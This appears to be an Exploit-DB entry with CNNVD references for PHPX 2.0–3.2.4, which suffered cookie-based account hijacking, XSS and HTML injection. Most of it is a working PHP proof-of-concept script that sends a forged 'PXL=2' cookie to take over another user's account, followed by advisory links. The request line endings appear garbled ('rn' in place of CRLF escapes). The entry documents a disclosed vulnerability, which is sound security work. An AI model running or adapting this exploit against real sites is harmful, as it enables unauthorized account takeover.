https://www.exploit-db.com/exploits/23644
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200411-143

PHPX2.0到3.2.4版本存在漏洞。远程攻击者可以通过修改cookie的PXL变量以参考其他userID来获取其他账户的访问权限。

source: http://www.securityfocus.com/bid/9569/info

Multiple vulnerabilities were reported in PHPX. The specific issues include cross-site scripting, HTML injection and account hijacking via specially crafted cookies.

These issues were reported to exist in PHPX 3.2.3. Earlier versions are also likely affected.

<?php
/* Proof of concept for exploiting PHPX 3.2.4 (http://www.phpx.org) */
/* Quick hack, not really an affective tool, only useful as a demonstration */
/* Written by HelloWorld - Ryan Wray */

/* Usage: php -q exploit_file.php <host> <port> <admin_folder_location> */
function usage()
{
    echo "Usage request";
}

function bytes_left($fp)
{
    $status=socket_get_status($fp);
    if($status['unread_bytes'] > 0) { return true; }
    return false;
}
print_r($_SERVER['argv']);
if($_SERVER['argc'] != 4)
{
    exit(usage());
}

// Attempt to connect to host.
$fp=@fsockopen($_SERVER['argv'][1],$_SERVER['argv'][2]);

if(!$fp)
{
    exit('Could not connect to host: '.$_SERVER['argv'][1].':'.$_SERVER['argv'][2]);
}

else
{
    fputs($fp,"GET ".$_SERVER['argv'][3]."index.php HTTP/1.1rn");
    fputs($fp,"Host: ".$_SERVER['argv'][1]."rn");
    fputs($fp,"Cookie: PXL=2rnrn");
}
// Start accepting data, otherwise socket_get_status will say there are 0 unread bytes.
echo fgets($fp,1024);
// While we can read.
while(bytes_left($fp))
{
    echo fgets($fp,1024);
}
// Close the socket.
fclose($fp);
?>

来源:BID
名称:9569
链接:http://www.securityfocus.com/bid/9569
来源:XF
名称:phpx-cookie-account-hijacking(15052)
链接:http://xforce.iss.net/xforce/xfdb/15052
来源:BUGTRAQ
名称:20040203MultipleVulnerabilitiesinPHPX
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=107586932324901&w;=2
来源:XF
名称:phpx-session-hijack(15512)
链接:http://xforce.iss.net/xforce/xfdb/15512
来源:SECUNIA
名称:10797
链接:http://secunia.com/advisories/10797/
来源:BUGTRAQ
名称:20040316PHPX2.x-3.2.4
链接:http://archives.neohapsis.com/archives/bugtraq/2004-03/0154.html